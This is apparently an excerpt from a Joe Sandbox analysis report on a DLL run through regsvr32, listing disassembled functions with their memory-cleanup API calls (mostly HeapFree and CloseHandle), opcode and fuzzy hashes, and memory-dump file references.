Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap$memcpy
String ID:
API String ID: 1887603139-0
Opcode ID: 71f361079f0a37da70f6bf646bb91781f7a86ddf65ab82c83465c0468c63ef4c
Instruction ID: 6281302f7240ee73de33bf869ea76ea718f79ae5604c967997288ee0331bcebf
Opcode Fuzzy Hash: 71f361079f0a37da70f6bf646bb91781f7a86ddf65ab82c83465c0468c63ef4c
Instruction Fuzzy Hash: A6516E2290EFC1A6F7259F2999413F923B0FF98798F04A132DE4D87695DF399295C200

Function 00007FF8A93276D6 Relevance: 7.6, APIs: 6, Instructions: 100memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A93276EE
HeapFree.KERNEL32 ref: 00007FF8A9327703
HeapFree.KERNEL32 ref: 00007FF8A9327737
HeapFree.KERNEL32 ref: 00007FF8A9327789
HeapFree.KERNEL32 ref: 00007FF8A93277C6
HeapFree.KERNEL32 ref: 00007FF8A93277FA
HeapFree.KERNEL32 ref: 00007FF8A9327812

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c84b0e6a4ee23237b019b26f46da8c711b34f636d66ab5c784b7a2464c293f19
Instruction ID: 404b1abda106f17b992c1c47c3bb6fe650e6aebdcc1091e2180baf43a9000b1c
Opcode Fuzzy Hash: c84b0e6a4ee23237b019b26f46da8c711b34f636d66ab5c784b7a2464c293f19
Instruction Fuzzy Hash: AF410766E0EEC5A8FB20DF65D8513F822B1EB98788F446036CA4D87799DE3DA545C240

Function 00007FF8A9327675 Relevance: 7.6, APIs: 6, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A9327759
HeapFree.KERNEL32 ref: 00007FF8A932776A
HeapFree.KERNEL32 ref: 00007FF8A9327789
HeapFree.KERNEL32 ref: 00007FF8A93277C6
HeapFree.KERNEL32 ref: 00007FF8A93277FA
HeapFree.KERNEL32 ref: 00007FF8A9327812

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 0b783f59c1477575a9282130fea674ab105f3219c7dca5074191f58495beccdc
Instruction ID: 6343404a386dd1b6324e3a62b74c25c95ea8e7c559379724643b5ea50c81d877
Opcode Fuzzy Hash: 0b783f59c1477575a9282130fea674ab105f3219c7dca5074191f58495beccdc
Instruction Fuzzy Hash: 40411A66A0EEC5A8FB10DF66D8513F822B1EB98B84F446036CA4D97795DE3DA551C200

Function 00007FF8A9349042 Relevance: 7.6, APIs: 5, Instructions: 91memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A9349063
SetLastError.KERNEL32 ref: 00007FF8A934917A
GetFullPathNameW.KERNEL32 ref: 00007FF8A934918F
GetLastError.KERNEL32 ref: 00007FF8A934919A
GetLastError.KERNEL32 ref: 00007FF8A93491B3

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: ErrorLast$FreeFullHeapNamePath
String ID:
API String ID: 526175943-0
Opcode ID: bfe9382463f47fbf3c34dd180c2b91d01f94d2c838e9508ec10290ac3e5afe7c
Instruction ID: 6f067469f76c2c97ce0027f1215ce4c7a6245776a6ffadce2dbf2b68115e598c
Opcode Fuzzy Hash: bfe9382463f47fbf3c34dd180c2b91d01f94d2c838e9508ec10290ac3e5afe7c
Instruction Fuzzy Hash: 5831C221A0EFC1AAE7319F6198483F926A4FB85BD8F11A131DD5ED77C6CE79D2448300

Function 00007FF8A934345D Relevance: 7.6, APIs: 6, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF8A9343463
CloseHandle.KERNEL32 ref: 00007FF8A93434B0
CloseHandle.KERNEL32 ref: 00007FF8A93434C5
HeapFree.KERNEL32 ref: 00007FF8A9343560
HeapFree.KERNEL32 ref: 00007FF8A9343585
CloseHandle.KERNEL32 ref: 00007FF8A934390C

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: CloseHandle$FreeHeap
String ID:
API String ID: 2735614835-0
Opcode ID: b55cb5934011795f104044e862f272562ff2184ef58b8431e0d1ccc53bafabf3
Instruction ID: a9f9b7156ffbac018ff01b00fdc3da6ec62d354726d3c444dcd2075bb6e55fcc
Opcode Fuzzy Hash: b55cb5934011795f104044e862f272562ff2184ef58b8431e0d1ccc53bafabf3
Instruction Fuzzy Hash: 52316E22A1EEC1E8FB649F21D8443FD23B0EF847C9F516076CA0E8B6A5CF38A5458601

Function 00007FF8A9307DCC Relevance: 7.6, APIs: 6, Instructions: 70memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF8A9301770: HeapFree.KERNEL32 ref: 00007FF8A930178D
Part of subcall function 00007FF8A9301770: HeapFree.KERNEL32 ref: 00007FF8A93017BD
Part of subcall function 00007FF8A9301770: HeapFree.KERNEL32 ref: 00007FF8A93017D8
Part of subcall function 00007FF8A9301770: HeapFree.KERNEL32 ref: 00007FF8A930180E
Part of subcall function 00007FF8A9301770: CloseHandle.KERNEL32 ref: 00007FF8A9301824
Part of subcall function 00007FF8A9301770: CloseHandle.KERNEL32 ref: 00007FF8A930183A
Part of subcall function 00007FF8A9301770: CloseHandle.KERNEL32 ref: 00007FF8A9301853

Part of subcall function 00007FF8A9301660: HeapFree.KERNEL32 ref: 00007FF8A930167B

HeapFree.KERNEL32 ref: 00007FF8A9308006
HeapFree.KERNEL32 ref: 00007FF8A93081FF
HeapFree.KERNEL32 ref: 00007FF8A9308220
HeapFree.KERNEL32 ref: 00007FF8A9308241
HeapFree.KERNEL32 ref: 00007FF8A930859B
HeapFree.KERNEL32 ref: 00007FF8A93087FA

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap$CloseHandle
String ID:
API String ID: 1910495013-0
Opcode ID: ca458f32a60fe7d35311c7fe61652346aa54bcdbc9a4e07fdcdb7913d33a8d79
Instruction ID: 19ef3a3e7a438e40f0d94f1ac3372e5951060b8524639fa981a6b72ab8812951
Opcode Fuzzy Hash: ca458f32a60fe7d35311c7fe61652346aa54bcdbc9a4e07fdcdb7913d33a8d79
Instruction Fuzzy Hash: 51311C21D0EDC2A0F664EF9194543FE5671EF887C4F4460B2D94ECAAD6CF6EE4449201

Function 00007FF8A9307DDE Relevance: 7.6, APIs: 6, Instructions: 67memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF8A9301660: HeapFree.KERNEL32 ref: 00007FF8A930167B

HeapFree.KERNEL32 ref: 00007FF8A9308006
HeapFree.KERNEL32 ref: 00007FF8A93081FF
HeapFree.KERNEL32 ref: 00007FF8A9308220
HeapFree.KERNEL32 ref: 00007FF8A9308241
HeapFree.KERNEL32 ref: 00007FF8A930859B
HeapFree.KERNEL32 ref: 00007FF8A93087FA

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: d1cb7b6d3df844538f43ff9c278c5995e210db7b8da7d1f2d081dfff15eb7a37
Instruction ID: ddce48d10610c08fe23cf8faaf587b08c045563e590dc8d69f06d628b307cdd2
Opcode Fuzzy Hash: d1cb7b6d3df844538f43ff9c278c5995e210db7b8da7d1f2d081dfff15eb7a37
Instruction Fuzzy Hash: 92311E21D0EDC6A0FA64EF9194543FA5271EF887C4F4470B2E94ECAAD6CF6EE4449201

Function 00007FF8A9307E92 Relevance: 7.6, APIs: 6, Instructions: 65memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF8A9301770: HeapFree.KERNEL32 ref: 00007FF8A930178D
Part of subcall function 00007FF8A9301770: HeapFree.KERNEL32 ref: 00007FF8A93017BD
Part of subcall function 00007FF8A9301770: HeapFree.KERNEL32 ref: 00007FF8A93017D8
Part of subcall function 00007FF8A9301770: HeapFree.KERNEL32 ref: 00007FF8A930180E
Part of subcall function 00007FF8A9301770: CloseHandle.KERNEL32 ref: 00007FF8A9301824
Part of subcall function 00007FF8A9301770: CloseHandle.KERNEL32 ref: 00007FF8A930183A
Part of subcall function 00007FF8A9301770: CloseHandle.KERNEL32 ref: 00007FF8A9301853

HeapFree.KERNEL32 ref: 00007FF8A9308006
HeapFree.KERNEL32 ref: 00007FF8A93081FF
HeapFree.KERNEL32 ref: 00007FF8A9308220
HeapFree.KERNEL32 ref: 00007FF8A9308241
HeapFree.KERNEL32 ref: 00007FF8A930859B
HeapFree.KERNEL32 ref: 00007FF8A93087FA

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap$CloseHandle
String ID:
API String ID: 1910495013-0
Opcode ID: 96fcb2b2969ba1d409e03a357e763d85d150db9a9edf786b4f7c06afd5022c44
Instruction ID: af9cf228da7402e05647e36fead0e206dabf894e11a1da18823f1ab219486d32
Opcode Fuzzy Hash: 96fcb2b2969ba1d409e03a357e763d85d150db9a9edf786b4f7c06afd5022c44
Instruction Fuzzy Hash: 1631FF21D0EDC2A0F664EF91D4543FE5271EF897C4F4460B2D94ECAAD6CF6EE4449201

Function 00007FF8A9307ED9 Relevance: 7.6, APIs: 6, Instructions: 65memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF8A9301770: HeapFree.KERNEL32 ref: 00007FF8A930178D
Part of subcall function 00007FF8A9301770: HeapFree.KERNEL32 ref: 00007FF8A93017BD
Part of subcall function 00007FF8A9301770: HeapFree.KERNEL32 ref: 00007FF8A93017D8
Part of subcall function 00007FF8A9301770: HeapFree.KERNEL32 ref: 00007FF8A930180E
Part of subcall function 00007FF8A9301770: CloseHandle.KERNEL32 ref: 00007FF8A9301824
Part of subcall function 00007FF8A9301770: CloseHandle.KERNEL32 ref: 00007FF8A930183A
Part of subcall function 00007FF8A9301770: CloseHandle.KERNEL32 ref: 00007FF8A9301853

Part of subcall function 00007FF8A9301660: HeapFree.KERNEL32 ref: 00007FF8A930167B

HeapFree.KERNEL32 ref: 00007FF8A9308006
HeapFree.KERNEL32 ref: 00007FF8A93081FF
HeapFree.KERNEL32 ref: 00007FF8A9308220
HeapFree.KERNEL32 ref: 00007FF8A9308241
HeapFree.KERNEL32 ref: 00007FF8A930859B
HeapFree.KERNEL32 ref: 00007FF8A93087FA

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap$CloseHandle
String ID:
API String ID: 1910495013-0
Opcode ID: a051034e064bfb0e781d1cea6ab065c995cd987561e1dc939444c84af77ef740
Instruction ID: 4f7329fe3bc3d68e3f92b0dcb16038c11694631f734dc86856c0831c03be0363
Opcode Fuzzy Hash: a051034e064bfb0e781d1cea6ab065c995cd987561e1dc939444c84af77ef740
Instruction Fuzzy Hash: 9F31FC21D0EDC2A0FA64EF9194543FE6271EF897C4F4460B2D94ECAAD6CF6EE4449201

Function 00007FF8A9307F0D Relevance: 7.6, APIs: 6, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF8A9301660: HeapFree.KERNEL32 ref: 00007FF8A930167B

HeapFree.KERNEL32 ref: 00007FF8A9308006
HeapFree.KERNEL32 ref: 00007FF8A93081FF
HeapFree.KERNEL32 ref: 00007FF8A9308220
HeapFree.KERNEL32 ref: 00007FF8A9308241
HeapFree.KERNEL32 ref: 00007FF8A930859B
HeapFree.KERNEL32 ref: 00007FF8A93087FA

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: e9213cd35a48a5552a62bf154e5dfc248b01ed4ac6c5cc24c4a33b1afaf8e22c
Instruction ID: 946b575e8e1519b45d873b2ead5d159a721521859a5426341908af5ee48dae30
Opcode Fuzzy Hash: e9213cd35a48a5552a62bf154e5dfc248b01ed4ac6c5cc24c4a33b1afaf8e22c
Instruction Fuzzy Hash: BB311E21D0EDC2A4FA64EF9194543FA5271EF897C4F4470B2D94ECAAD6CF6EE4449201

Function 00007FF8A93082C4 Relevance: 7.6, APIs: 6, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A93082D8

Part of subcall function 00007FF8A9354020: RtlCaptureContext.NTDLL ref: 00007FF8A93540B2
Part of subcall function 00007FF8A9354020: RtlUnwindEx.KERNEL32 ref: 00007FF8A93540EF
Part of subcall function 00007FF8A9354020: abort.MSVCRT ref: 00007FF8A93540F5
Part of subcall function 00007FF8A9354020: RaiseException.KERNEL32 ref: 00007FF8A9354132

HeapFree.KERNEL32 ref: 00007FF8A9308322
HeapFree.KERNEL32 ref: 00007FF8A93087AE
CloseHandle.KERNEL32 ref: 00007FF8A93087B8
HeapFree.KERNEL32 ref: 00007FF8A93087D9
HeapFree.KERNEL32 ref: 00007FF8A93087FA

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap$CaptureCloseContextExceptionHandleRaiseUnwindabort
String ID:
API String ID: 245745995-0
Opcode ID: 4ecd2aab2c035fdebee44bbd639b7e9e43dcb59622eaf31463b29cdc139c410c
Instruction ID: ad2fa8006855c7108d452106e7aaec01c2a92955db413fa0d6cba921bf020cc0
Opcode Fuzzy Hash: 4ecd2aab2c035fdebee44bbd639b7e9e43dcb59622eaf31463b29cdc139c410c
Instruction Fuzzy Hash: 87313010D0EDC2A0EA24EF96D4553FA5371EFC87C0F446071D64ECA6E6DE7DE4408640

Function 00007FF8A9307EA4 Relevance: 7.6, APIs: 6, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A9308006
HeapFree.KERNEL32 ref: 00007FF8A93081FF
HeapFree.KERNEL32 ref: 00007FF8A9308220
HeapFree.KERNEL32 ref: 00007FF8A9308241
HeapFree.KERNEL32 ref: 00007FF8A930859B
HeapFree.KERNEL32 ref: 00007FF8A93087FA

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: a9a824fd2e85c0b7eb43eabc4495df079148a73108f8a60a3244d281df5b7263
Instruction ID: 1ee60674d372d9ab9d0a6fe6f072f1c3be9aa6f84d960fd3a3ba1df17f17e962
Opcode Fuzzy Hash: a9a824fd2e85c0b7eb43eabc4495df079148a73108f8a60a3244d281df5b7263
Instruction Fuzzy Hash: 4C212E21D0EDC2A0FA64EF9294543FE5271EF897C4F4470B2D94ECAADACF6EE0449201

Function 00007FF8A9307FDE Relevance: 7.6, APIs: 6, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF8A9301770: HeapFree.KERNEL32 ref: 00007FF8A930178D
Part of subcall function 00007FF8A9301770: HeapFree.KERNEL32 ref: 00007FF8A93017BD
Part of subcall function 00007FF8A9301770: HeapFree.KERNEL32 ref: 00007FF8A93017D8
Part of subcall function 00007FF8A9301770: HeapFree.KERNEL32 ref: 00007FF8A930180E
Part of subcall function 00007FF8A9301770: CloseHandle.KERNEL32 ref: 00007FF8A9301824
Part of subcall function 00007FF8A9301770: CloseHandle.KERNEL32 ref: 00007FF8A930183A
Part of subcall function 00007FF8A9301770: CloseHandle.KERNEL32 ref: 00007FF8A9301853

HeapFree.KERNEL32 ref: 00007FF8A9308006
HeapFree.KERNEL32 ref: 00007FF8A93081FF
HeapFree.KERNEL32 ref: 00007FF8A9308220
HeapFree.KERNEL32 ref: 00007FF8A9308241
HeapFree.KERNEL32 ref: 00007FF8A930859B
HeapFree.KERNEL32 ref: 00007FF8A93087FA

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap$CloseHandle
String ID:
API String ID: 1910495013-0
Opcode ID: 8f7652124dc6a1ff58f7b8a6123205dee40091aa97b7779a65f3d1e6cd823f0f
Instruction ID: 4424fe610e217494cea02aad86c904385596bdbcce201b784fb9b4d9bd9057b8
Opcode Fuzzy Hash: 8f7652124dc6a1ff58f7b8a6123205dee40091aa97b7779a65f3d1e6cd823f0f
Instruction Fuzzy Hash: ED212F21D0EDC2A4FA64EF9194543FE5271EF897C4F4470B2D94DCAAD6CF6EE4449201

Function 00007FF8A9307F77 Relevance: 7.6, APIs: 6, Instructions: 58memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A9307F8B

Part of subcall function 00007FF8A9301770: HeapFree.KERNEL32 ref: 00007FF8A930178D
Part of subcall function 00007FF8A9301770: HeapFree.KERNEL32 ref: 00007FF8A93017BD
Part of subcall function 00007FF8A9301770: HeapFree.KERNEL32 ref: 00007FF8A93017D8
Part of subcall function 00007FF8A9301770: HeapFree.KERNEL32 ref: 00007FF8A930180E
Part of subcall function 00007FF8A9301770: CloseHandle.KERNEL32 ref: 00007FF8A9301824
Part of subcall function 00007FF8A9301770: CloseHandle.KERNEL32 ref: 00007FF8A930183A
